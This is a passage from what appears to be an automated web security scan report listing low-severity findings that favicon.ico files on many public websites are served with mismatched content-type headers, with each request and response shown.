Last-Modified: Mon, 23 Jun 2008 23:06:11 GMT
Cache-Control: public, max-age=315360000
Accept-Ranges: bytes
Date: Fri, 10 Dec 2010 20:14:23 GMT
Vary: Accept-Encoding
Content-Length: 1150
Content-Type: text/plain
Server: Apache
Expires: Mon, 07 Dec 2020 20:14:23 GMT

............ .h.......(....... ..... ...........................................]2..]...]...]...]...]...]...]2..........................]
..]...]...]...]...]...]...]...]...]...]...]
..............]
..
...[SNIP]...
27.53. http://www.craveonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.craveonline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craveonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/plain; charset=UTF-8
Content-Length: 5430
cache-control: max-age = 600
Date: Sat, 02 Apr 2011 14:19:12 GMT
X-Varnish: 732507004 732501108
Age: 116
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT from pxy1v.sb.lax2

............ .h...&... .... .........(....... ..... ...................................................................................................................................................
...[SNIP]...
27.54. http://www.cyberdefender.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cyberdefender.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cyberdefender.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:26 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: clickforensics=208.118.60.116.1301751386236547; path=/
Last-Modified: Fri, 08 Oct 2010 18:52:31 GMT
ETag: "128eb5-47e-4921f8347b9c0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................jki!jki.jki.jki.jki.jki!....................................jkiajki.....wv..wv......jki.jkia..........................
...[SNIP]...
27.55. http://www.datpiff.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.datpiff.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.datpiff.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Last-Modified: Sun, 14 Sep 2008 17:49:04 GMT
ETag: "5c90082-e36-456debc04c400"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug

..............h...&... ..............(....... ...........@...............................BAB.....! !.....cec.RUR.........101.sus.............)().....989.....JIJ.kmk.{}{.........ZYZ.................!$
...[SNIP]...
27.56. http://www.denverpost.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.denverpost.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.denverpost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 02 Apr 2011 13:34:06 GMT
Content-Length: 15
Connection: close

File not found.
27.57. http://www.detiva.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.detiva.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.detiva.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:38 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Sat, 10 Mar 2007 19:53:11 GMT
ETag: "2a0187-9f6-e3cf37c0"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...
27.58. http://www.diablomedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.diablomedia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diablomedia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:02 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Tue, 04 Nov 2008 17:18:25 GMT
ETag: "11299e9-e36-45ae0404ffa40"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................D|................L.AA.......L..fe....l.65o.6c..........gm.......8......'E..S^.......,......CU...F..tt.......;....
...[SNIP]...
27.59. http://www.directbuyvisitorpass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.directbuyvisitorpass.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directbuyvisitorpass.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:08 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:40:54 GMT
ETag: "1bd8901-57e-496d8dbf1c580"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 04:59:08 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................$...zu..........jd..www.....................................JJJ..........................z.......kkk.{.{.999.....9s..ZZ
...[SNIP]...
27.60. http://www.doityourself.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.doityourself.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 05 Aug 2010 22:36:08 GMT
ETag: "3362228-37e-48d1b2d26e600"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 894
Date: Sat, 02 Apr 2011 13:43:19 GMT
Age: 310500
Connection: keep-alive
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

..............h.......(....... ...................................................................................................................................................|.u6..~...............
...[SNIP]...
27.61. http://www.dreamstime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dreamstime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dreamstime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:26 GMT
Server: Apache
Last-Modified: Tue, 24 Mar 2009 11:27:20 GMT
ETag: "3f0460-47e-465dbaa861600"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ......%......................................................................................................t...0..5A../...
......................................
...[SNIP]...
27.62. http://www.driverside.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driverside.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Fri, 07 Mar 2008 02:28:25 GMT
ETag: "70afd-e36-447cf9bd3e440"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h...&... ..............(....... ...........@...........................R.c.........{...B.J.....k.s.........s.......J.R.............c.s.s.{.....R.Z.....J.R.Z.k.....c.k.s.{.............R.
...[SNIP]...
27.63. http://www.eatingwell.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.eatingwell.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.eatingwell.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 28 Feb 2011 22:06:09 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 14:18:54 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................................ofc..(/.fji.vyt.mok.jie..............................=:..........2:.,S[.........x{u.WUV...............
...[SNIP]...
27.64. http://www.ebaumsworld.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ebaumsworld.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ebaumsworld.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:31 GMT
Server: Apache/2.2.17 (EL)
Last-Modified: Mon, 02 Feb 2009 22:06:45 GMT
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

..............(.......(....... ........................................................................................................................".....""....... .........    .......................
...[SNIP]...
27.65. http://www.economist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.economist.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.economist.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:57:35 GMT
ETag: "783ce-57e-49f50a70279c0"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:20:47 GMT
X-ws: 4
Content-Type: text/plain; charset=UTF-8
Content-Length: 1406
Date: Sat, 02 Apr 2011 13:54:46 GMT
X-Varnish: 1459381508 1449341496
Age: 365639
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: HIT
Vary: Accept-Encoding

..............h.......(....... ...........@.......................ss....................................................................................................................................
...[SNIP]...
27.66. http://www.ed.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ed.gov
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ed.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:25:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.
27.67. http://www.egotastic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.egotastic.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.egotastic.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Length: 3638
Connection: close
Content-Type: text/html; charset=UTF-8

...... ..........&...........h.......(... ...@........................................]......[...............OG..........[...vw...)....................................................................
...[SNIP]...
27.68. http://www.ehealthforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ehealthforum.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehealthforum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:02 GMT
Server: Apache
Last-Modified: Tue, 23 Sep 2008 12:24:47 GMT
ETag: "8e59f3-8be-4578f40dce1c0"
Accept-Ranges: bytes
Content-Length: 2238
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerehealthforum_POOL=3336900780.0.0000; path=/

...... ..............(... ...@.......................................................................................................G.....W....I.U.A............. .....M........... ....(...........
...[SNIP]...
27.69. http://www.ehow.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ehow.co.uk
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ehow.co.uk
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 1150
Content-Type: text/html
Set-Cookie: v=NEW; expires=Mon, 02 May 2011 14:00:19 GMT; path=/; domain=www.ehow.co.uk;
ETag: "6ed485fcdbc3fdf6d0a3a393e95f5a88:1300482785"
Cache-Control: max-age=40957
Date: Sat, 02 Apr 2011 14:00:19 GMT
Connection: close

............ .h.......(....... ..... .....@......................................s...........................c...........................,...........................................................,..
...[SNIP]...
27.70. http://www.epicurious.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epicurious.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epicurious.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 04 Jun 2008 23:08:29 GMT
ETag: "62a-47e-44edf4e873540"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:00:00 GMT
Connection: close
Cache-Control: max-age=600
Expires: Wed, 16 Mar 2011 22:53:18 GMT

............ .h.......(....... ..... ...............................3...3...3...3...3...3...3...3...3...3...3...3...3...3.......4...4...4...4...4...4...4...4...4...4...4...4...4...4...4...4...6...6...
...[SNIP]...
27.71. http://www.epinions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.epinions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.epinions.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:50 GMT
Server: Apache/2.2.14 (Unix) PHP/4.4.9
Cache-control: private
Set-Cookie: EPV_PgVwID=e060b1a6c3caf55e5af3d016; path=/; domain=.epinions.com;
Content-Length: 2494
Content-Type: text/html

...... ..............(... ...@...................................@............ ..@ ... ... ...@..@@...@...@...`..@`...`...`......@...............@...............@...............@............. .@. ...
...[SNIP]...
27.72. http://www.examiner.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.examiner.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.examiner.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sat, 02 Apr 2011 12:43:53 GMT
Content-Type: text/plain; charset=UTF-8
Connection: keep-alive
Last-Modified: Fri, 01 Apr 2011 19:35:39 GMT
ETag: "a84a1-47e-49fe083c418c0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 12:43:53 GMT
X-WebNode: web7.b.examiner.com

............ .h.......(....... ..... .....@....................................f3`.f3..f3..f3..f3..f3..f3..f3`.........................f3 .f3..f3..f3..f3..f3..f3..f3..f3..f3..f3..f3 .............f3 .f
...[SNIP]...
27.73. http://www.ezanga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ezanga.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ezanga.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 03 Jan 2010 01:06:23 GMT
ETag: "1950026-57e-47c38369b41c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................................!...    #..<.,..#*.l'?..R...`...y>.BH3.BB<.)FM.(OM.{nX....K...R..V.:._...I...Y...d...l..x.!.h.'.x.I.d.[.|...j...r.......
...[SNIP]...
27.74. http://www.familybuilder.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.familybuilder.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a PNG image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.familybuilder.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 03 Feb 2011 20:05:58 GMT
ETag: "200a6c6-288-49b664b3b7580"
Accept-Ranges: bytes
Content-Length: 648
Connection: close
Content-Type: text/plain; charset=UTF-8

.PNG
.
...IHDR...............h6....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?......... .V...][y......ow....l8.v..../..%.)....s/.-.............|>...(......h.....,...7X4...=..F.a
...[SNIP]...
27.75. http://www.fantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fantage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fantage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:50 GMT
Server: Apache
Last-Modified: Wed, 24 Dec 2008 23:18:01 GMT
ETag: "a704a2-25be-45ed31a685c40"
Accept-Ranges: bytes
Content-Length: 9662
Content-Type: text/plain; charset=UTF-8

......00.... ..%......(...0...`..... ...................................................................................................................................................................
...[SNIP]...
27.76. http://www.faqs.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.faqs.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.faqs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:36 GMT
Server: Apache
Last-Modified: Thu, 05 Mar 2009 07:19:28 GMT
ETag: "61f8071-e36-46459fd194000"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

...... ..........&...........h.......(... ...@.......................................pp..UU..XX..yy..........--..............vw..........ED..........!!.."!.. ...........''..xy..........''..$"..$$..$#
...[SNIP]...
27.77. http://www.fastcompany.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fastcompany.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:52 GMT
Server: VoxCAST
Last-Modified: Wed, 11 Mar 2009 23:44:19 GMT
ETag: "c39671-3aee-464e0723e9ac0"
Accept-Ranges: bytes
Content-Length: 15086
Cache-Control: max-age=604800
Expires: Thu, 07 Apr 2011 06:45:23 GMT
Vary: Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 198569
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$.................................................................................................+...Z...x..................
...[SNIP]...
27.78. http://www.fetedoris.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fetedoris.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fetedoris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:36 GMT
Server: Apache/2.2.2 (Fedora)
Last-Modified: Fri, 23 Jul 2010 00:22:56 GMT
ETag: "2b001f-9f6-951f800"
Accept-Ranges: bytes
Content-Length: 2550
Connection: close
Content-Type: text/plain

..............h...&......... .h.......(....... ...................................4/..B=..OK..]Y..jg..xu..............................'"..S.k.i.n.s.\.N.e.w. .l.o.g.o.\.w.o.r.k. .P.L.E.S.K.\.i.c.o.\._.
...[SNIP]...
27.79. http://www.filestube.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.filestube.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.filestube.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:23:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 9
Connection: close
Content-Type: text/html; charset=iso-8859-1

Not found
27.80. http://www.findagrave.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.findagrave.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findagrave.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:26 GMT
Server: Apache
Last-Modified: Mon, 08 Nov 2010 21:53:32 GMT
ETag: "1a78463-57e-49491a7ba0f00"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ........................................................,,,.........LLL...............................................................................................
...[SNIP]...
27.81. http://www.finishline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.finishline.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.finishline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 28 Apr 2006 20:50:34 GMT
ETag: "384135-1036-db2cba80"
Accept-Ranges: bytes
Content-Length: 4150
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close

...... ..........F...........h....... ......0...V...................(... ...@...................................................................................k...H...%............z...b...Js..2P...
...[SNIP]...
27.82. http://www.flixster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flixster.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.flixster.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:46:18 GMT
ETag: "47e"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................(rt..@E..BI..BK..@L..bn.....8...............................^........ 6..q........3.......-..Zj........................
...[SNIP]...
27.83. http://www.food.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.food.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.food.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 03 Mar 2011 11:48:55 GMT
Accept-Ranges: bytes
Content-Length: 1406
X-Cnection: close
Content-Type: text/plain
X-Pad: avoid browser bug
Expires: Sat, 02 Apr 2011 15:42:53 GMT
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close

..............h.......(....... ...............................u!......4.................................................................................................................................
...[SNIP]...
27.84. http://www.fortunecity.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fortunecity.com
Path:   /favicon.ico

Issue detail

